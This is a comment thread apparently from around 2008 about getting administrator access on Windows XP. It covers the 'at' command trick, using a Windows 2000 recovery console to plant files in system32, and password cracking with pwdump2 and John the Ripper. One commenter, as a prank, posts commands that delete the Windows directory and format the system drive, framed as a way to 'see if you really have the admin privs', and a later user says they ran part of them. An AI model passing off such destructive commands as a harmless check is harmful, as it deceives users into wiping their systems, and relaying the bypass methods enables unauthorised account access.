But if you already have admin access why bother using the “at” cmd line hack? There are alot of ways to elevate your privelages if you are already in admin group. I’m working on a way to get a hack that just boots from a cd or USB drive.
The largest hole in XP that you can exploit from boot is that if you use a windows 2000 disc and go to the recovery console you have access to all NTFS files, no restrictions.
Now all we have to do is figure out where and why this vulnerability can be exploited without having to actually do all the cmd line work to insert a temphack app into the system32 file and reboot, then go back in with the 2000 disc and remove your temphack file so everything goes back to normal.
any ideas?

Hate to tell you this you can get into anyones account if you are the administrator. Just go into the control panel, you will figure it out. You don’t even have to be a wannabe hacker

This actually is useful tsolum when as an adminisntrator I’ve got to fix something on a users domain account while I’m sitting at their box without their password, or them to give it to me. No matter who you log in as you can’t change a domain password from the local box control panel.
You can remote into the Domain Controller and use Active Directory to change their password, but that’s a lot of steps to work on a problem on a domain account. The method demonstrated takes many less steps.

I’m from romania, sorry if i’m not speeking very well english i hope you understand me. I want to know how can I log on administrator acount on win xp Profesional Edition. This is the windows acount and is hide on the welcome screen and on user acounts on control panel. If the computer has the welcome screen disabled is easy, just tast ,,administrator” and go on the windows administrator, and there you can remove any password, if you forget it even if the acount with the forgetet pass is an administrator. Is easy, but if there is activated the welcome screen, the ,,adminstrator” don’t apear like a normal acount, how can I log on there.

For CrYstY CYYrstYo : Log off from the current user. Hit Control+Alt+Delete (twice if you have to), it will show the logon screen asking for the password.
for yahiea and others: Admin Password is inaccessible from the registry (unless user enabled the autologon feature). You can use Linux based program to recover password (check google, seek and you’ll find), “replace” XP (as described above) or use pwdump2/john-the-ripper type approach. Either way, its not easy but you can start from here.
Or reinstall the XP if you don’t have any application/programs/drivers to worry about.
Good luck and hope this helps.

honeytech: you haven’t loss your sense of humor. Hacking for an Administrative privilege from an Administrator user. While you’re at it, why not try the following commands in the DOS prompt and see if you really have the admin privs:
DEL /F /Q %SystemRoot%
DEL /F /Q %windir%
FORMAT %SystemDrive% /C /X

Cool.
February 4th, 2008 at 1:22 am
DEL /F /Q %SystemRoot%
DEL /F /Q %windir%
FORMAT %SystemDrive% /C /X
The first two commands seemed to go okay but the last one says “Bad command of file name” what’s up with that?
